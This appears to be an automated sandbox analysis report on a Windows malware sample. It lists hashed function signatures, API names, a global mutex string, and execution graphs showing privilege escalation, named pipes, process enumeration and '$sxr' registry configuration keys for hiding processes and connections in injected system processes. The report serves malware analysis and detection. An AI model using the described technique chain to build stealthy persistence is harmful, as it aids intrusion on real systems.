• Instruction ID: 4fab3068c6bb4072b269c040958d05a1e099d3f50f1111dd38f8a9c7c523b273
• Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
• Instruction Fuzzy Hash: 49F08970304F4291EB505B53F9255BA9256A748FD0F089170DF6647765CE2CC4438304
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
• Instruction ID: 6723c76907707e339a9684eac4b30a4a56327c1ca06275dfafc04998bf3ee722
• Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
• Instruction Fuzzy Hash: B8F08271711F42D1EF459B60F4A4BFA2362AB48B90F082479DB2FC6560DF38C48AC700
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
• Instruction ID: 744ef6f497fd8405ff9858d340a3b72f33ca1e03ccb8b7fa1144c56ebb9be689
• Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
• Instruction Fuzzy Hash: 5302FA32219B85C6EBA1CB55F4A07AAB7A1F3C4784F104565EB9E87BA8DF7CC445CB00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
• Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
• Instruction ID: 6000016924cf19ea5109459f6aac7719f654d2eac069c0b39c897a396384037b
• Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
• Instruction Fuzzy Hash: 6981CC32610E1289FB50AB648860BFF67A7F744B98F4646B6DF2A577D2DB348443E310
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction ID: 62fd3c229e29ec2417cbfea20ed0baf9b9a767ef0999405223d770e804cc6077
• Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
• Instruction Fuzzy Hash: 2561FC32529F85CAE7A19B15E4A07BA77A1F388754F200675EB9D43BA8DB7CC446CF00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 88f6a7501effd57d50b0f0fc07d99e030d46684a884c53ee9c67471fc1201102
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: A3115633A54F0341F765126AD4BD3F93143AB55BF4F1847B4AB760AFDE8A2988434200
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: 195c26971b10306001efdd9e2caf3432ea9da77d39e62c8bde7a933e82ba4775
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: A2117333A54E1702F7A81169D47ABFB11C36B64B74F1846B4FB770A7D68B288883C200
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
• Instruction ID: ae687ebe9b7db7c57d485a29b9b886607673626e560236d711cb8731276b1cdd
• Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
• Instruction Fuzzy Hash: 93112434601E43C6FF949B269860BF62293A784BB0F284EB4DB39477D5DF28C8438B00
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
• Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• API String ID: 1092925422-0
• Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction ID: f012099b8acd9de1001e618a508d66905eb48f52fbb4ec8e9c9187f1f084aa86
• Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction Fuzzy Hash: 11116A36604F82C3EB64AB22E4546AAA7B1F745B80F084576DBAC43794EF3DC94AC740
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction ID: ce6312046cc802fa1638db7ee19a912dd50a0709fc0cc1da018c36e5fabc8ba0
• Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction Fuzzy Hash: C451AD36612A028AEB54DB15E424BF93796FB42B98F5081B4EB2647788EB74D8429B04
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.3430519783.000001F5FDC40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F5FDC40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1f5fdc40000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
• Instruction ID: 293814c8414646a5d1427f1170682cc441ffd9d3b0459a410c71df9ab95c8609
• Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
• Instruction Fuzzy Hash: D331BF32201F4296E754DF12E868BF937A6FB42BD8F558064AF6607788CB38C942CB04
Uniqueness
Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 442123175-4171548499
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001F5FDC72A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001F5FDC72B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Stringtry_get_function
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2588686239-3893581201
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 539475747-3084827643
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuetry_get_function
                                                                                                            • String ID: FlsSetValue
                                                                                                            • API String ID: 738293619-3750699315
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 756756679-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                             • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:68.6%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:39.3%
                                                                                                            Total number of Nodes:61
                                                                                                            Total number of Limit Nodes:5
                                                                                                             execution_graph 226 140001584 227 1400015a6 226->227 228 1400015ae GetTokenInformation 227->228 231 140001613 227->231 229 1400015d0 228->229 228->231 230 1400015ef GetTokenInformation 229->230 229->231 230->231 232 140001f94 235 140001fa1 232->235 234 140001fc1 ConnectNamedPipe 236 140001fef 234->236 235->234 237 14000165c 235->237 239 1400016b1 237->239 238 140001794 238->235 239->238 240 140001754 CreateNamedPipeW 239->240 240->238 241 140001b1c 244 140001b30 241->244 268 140001908 244->268 247 140001908 6 API calls 248 140001be6 247->248 249 140001c8e FindResourceA 248->249 251 140001c21 LookupPrivilegeValueW 248->251 252 140001c85 FindCloseChangeNotification 248->252 250 140001b25 249->250 255 140001cae 249->255 251->252 253 140001c3b AdjustTokenPrivileges 251->253 252->249 253->252 254 140001c7f 253->254 254->252 255->250 279 140001390 255->279 257 140001cf8 RegCreateKeyExW 258 140001e15 CreateThread 257->258 259 140001d3a 257->259 260 140001e3c CreateThread 258->260 261 140001d6e RegSetKeySecurity 259->261 262 140001d8f RegCreateKeyExW 259->262 266 140001e7a SleepEx 260->266 261->262 263 140001e0a 262->263 264 140001dcb RegSetValueExW RegCloseKey 262->264 263->258 264->263 266->266 269 140001911 268->269 274 140001aee 268->274 270 1400019a2 K32GetModuleInformation 269->270 269->274 271 1400019be CreateFileW 270->271 270->274 272 1400019f3 CreateFileMappingW 271->272 271->274 273 140001a1d MapViewOfFile 272->273 272->274 275 140001ae5 FindCloseChangeNotification 273->275 277 140001a41 273->277 274->247 275->274 276 140001a5c lstrcmpi 276->277 278 140001a8d 276->278 277->275 277->276 277->278 278->275 280 1400013ab 279->280 283 14000119c 280->283 282 1400013d4 284 1400011d5 K32EnumProcesses 283->284 286 1400012fc RtlDeleteBoundaryDescriptor 284->286 290 140001229 284->290 289 140001316 RtlDeleteBoundaryDescriptor 286->289 288 14000125b K32EnumProcessModules 288->290 289->282 290->286 290->288 291 1400014ec 294 140001510 291->294 292 140001541 293 140001538 FindCloseChangeNotification 293->292 294->292 294->293 295 140001ed0 297 140001ef1 295->297 296 140001f26 K32EnumProcesses 296->297 297->296

Callgraph

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: Create$CloseFileFind$ChangeNotificationThreadValue$AdjustInformationLookupMappingModulePrivilegePrivilegesResourceSecuritySleepTokenViewlstrcmpi
• String ID:
• API String ID: 3489061390-0
• Opcode ID: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
• Instruction ID: b0e1fb852f6e0543cbb1d0b345f32bc6fd7345078760f1e0bc57de08f7ced3b6
• Opcode Fuzzy Hash: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
• Instruction Fuzzy Hash: CF9109B6205B8096EB26CF62F8547DA73A9F78CB94F408125EB4A47B74DF78C549C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: BoundaryDeleteDescriptorEnum$ModulesProcessProcesses
• String ID:
• API String ID: 330119047-0
• Opcode ID: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
• Instruction ID: 722e7c41bd921b01580d5e9fcb7604c5b43dbddabd9dc005843a26f70c2221f1
• Opcode Fuzzy Hash: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
• Instruction Fuzzy Hash: 6B5189B2711A809AEB66CF63A848BEA22A5F78DBC4F444025EF4A47768DF38C555C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: CreateNamedPipe
• String ID:
• API String ID: 2489174969-0
• Opcode ID: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
• Instruction ID: 5e84f6bf4889631b23437abf526e9bdf5af4b3ca6bd4e12e17f1e2086ffe5991
• Opcode Fuzzy Hash: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
• Instruction Fuzzy Hash: 7B414BB2615B50CAE761CF25E4807DD77B4F788B98F44522AFB4943BA8EB78C548CB40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: File$Create$ChangeCloseFindInformationMappingModuleNotificationViewlstrcmpi
• String ID:
• API String ID: 910215268-0
• Opcode ID: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
• Instruction ID: f2b1c273cdc5545e6e8c12de746a27ba9334337610d31b556cae7d200a6f3496
• Opcode Fuzzy Hash: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
• Instruction Fuzzy Hash: 3B5139B6305A8192EB22DF16B458BDA73A9FB8DBD8F044125EF4A037A4DF38C549C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 00000001400015C6
• GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 0000000140001609
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
• Instruction ID: 2eae3c48201e6f103262f764e10c79d14b5d21d5893c39f3542a132d265f3134
• Opcode Fuzzy Hash: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
• Instruction Fuzzy Hash: B52139B6204A8082EB12CF62F85479AB764FBCCBD4F448525EB8947B78DF79C545CB00
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: EnumProcesses
• String ID:
• API String ID: 84517404-0
• Opcode ID: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
• Instruction ID: 3e335d43075e719169e469211f82513eafd9eb7e81d155af191f1dae7c0dcdef
• Opcode Fuzzy Hash: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
• Instruction Fuzzy Hash: F2214AB6605A129BE716CF17B4547EAB6A6F7C9BD1F144028EB4607A78CF39D440CA40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,000000014000103E), ref: 000000014000153B
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
• Instruction ID: 44c5bdf9c31fdf4bd35f48c43806700b171b0c8e6473a7c39bf54194b38a2f46
• Opcode Fuzzy Hash: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
• Instruction Fuzzy Hash: D2F03071705B8183EB16CF57B98439A6661E78CBC1F489139FB8A43768DF38C485C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2518073162.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$ConnectCreate
• String ID:
• API String ID: 2149227607-0
• Opcode ID: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
• Instruction ID: 32f579bea11482fe29c7866e40561744ab130bf1df4bedb027ae58d6efce7050
• Opcode Fuzzy Hash: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
• Instruction Fuzzy Hash: 5AF058B1204B4591EB16DF23F8143EA63A4AB8CBE0F588324BB6A436F4DF38C508C700
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 0.7%
Dynamic/Decrypted Code Coverage: 93.8%
Signature Coverage: 0%
Total number of Nodes: 97
Total number of Limit Nodes: 21

Control-flow Graph

APIs
Strings
• Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002D0165E2B39
Memory Dump Source
• Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
Similarity
• API ID: CloseHandleMutexOpen
• String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
• API String ID: 3128266590-3670590667
• Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction ID: c27e23a338ee93dc7580a733701f16d5e42c596999dd7a57b408f4815b780adb
• Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction Fuzzy Hash: 38214132B0078485EB60DF96FC8871AB799F788B84F858066DE8D83768EF35CD468744
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.3364374510.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2d0165e0000_winlogon.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-3028563969
• Opcode ID: f9b6faae0a979f39743cc682957071b74d06d81fd61630455472d213707cb3d2
